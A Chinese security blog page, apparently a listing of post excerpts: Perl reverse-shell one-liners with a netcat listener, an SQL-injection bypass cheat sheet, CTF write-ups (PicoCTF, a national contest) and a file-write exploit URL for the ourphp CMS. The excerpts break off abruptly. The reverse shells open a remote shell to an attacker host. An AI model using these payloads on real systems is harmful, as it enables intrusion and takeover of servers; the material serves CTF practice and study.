Windylh's blog

攻击机监听

1

nc -lvvp 7777

靶机远程反弹shell

Perl

1
2
3
4

perl -e 'use Socket;$i="x.x.x.x";$p=xxxx;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"x.x.x.x:xxxx");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

整理一下sql注入的各种绕过姿势，以后做题方便查阅。

0x00 注释符

常用注释：

1
2
3
4
5
6
7
8

//
--%20
/**/
#
--+
-- -
%00
;

0x01 大小写绕过

用于绕过一些对大小写敏感的黑名单匹配

Misc

SandGame

1
2
3
4
5
6
7
8
9
10
11
12

import flag

flag = flag.flag
sands = int(flag[5:-1].encode("hex"), 16)

holes = [257, 263, 269, 271, 277, 281, 283, 293, 307, 311, 313, 317, 331, 337, 347, 349, 353, 359, 367, 373]

with open("sand.txt", "w") as f:
    for i in range(len(holes)):
        sand = sands % holes[i]
        f.write(str(sand)+"\n")

这次国赛作为一个Web选手倍受打击，web需要pwn师傅，crypto需要反编译，misc需要内核分析，mong男落泪，以后要学习一下二进制知识了。写了几个自己做出来的题的writeup。

Misc

验证码[签到版]

开赛的时候以为是机器学习，尝试着随便点了点时间到了就拿到了flag，估计是出了非预期解。

picture

图片放入binwalk

Web

Web200

op参数能读取执行功能的php，尝试用位协议读取源码。

php://filter/read=convert.base64-encode/resource=xxx

得到源码

home.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15

<?php
include 'common.php';
?>
<center>
<div class="article">
    <h2>Welcome!!</h2>
    <p>
        We let you upload PNG image files and store it!<br/>
    </p>
    <p>
        Get started by <a href="?op=upload">uploading a picture</a>
    </p>
    
</div>
</center>

指向common.php

WEB

签到题

查看源代码
<input type="text" maxlength="3" name="pass"/>
提示输入更大的数，并限制了text的maxlength，F12修改html，删除maxlength部分.

0x00 Payload

1

/client/manage/ourphp_filebox.php?op=save&encode=UTF-8&fename=1.php&ncontent=<?php phpinfo(); ?>

在登陆后台后，可直接上传文件。

代码分析

/ourphp/client/manage/ourphp_filebox.php 694行

在表哥的推荐下接触了PicoCTF，记录一下自己的解题思路

Tutorial

Tutorial 1

给了一个list，找出Robin Morris的中间名，直接搜索，找到Robin Almay Morris

Tutorial 2

打开链接

1
2
3
4

Hey, checkout this super secret message I made, using this cool ROT13
cipher I found online!

Lb, fb unir lbh orra cynlvat gung arj Zrfbcrgf tnzr? Gubfr arj Zrtnybalpuvqnr naq Oenqlcbqvqnr gurl nqqrq ner cerggl pbby. Npghnyyl, V jbhyq tb nf sne nf fnlvat gung vg vf abj zl yvsr'f qrnerfg nzovgvba gb bognva n "Vasyngnoyr Fybgu Zbafgre"!

直接给出了rot13的提示，解密

Web

My First SQL

网页是一个登录界面，尝试万能密码。

1
2

admin
'or'1'='1

成功登陆。

分析sql查询语句如下
select * from users where user = 'admin' and pass = ''or'1'='1';

Web

Biscuit

打开题目，显示Access Denied，还有姜饼人的背景。

查看源代码，其中有注释。

1
2

<!-- Storing stuff in the same directory as your web server doesn't seem like a good idea -->
<!-- Thankfully, we use a hidden one that is super PRIVATE, to protect our cookies.sqlite file -->

提示我们去访问/private/cookies.sqlite文件。

下载到了cookies.sqlite，sqlite是一种轻型的数据库，要用sqlite3去打开他。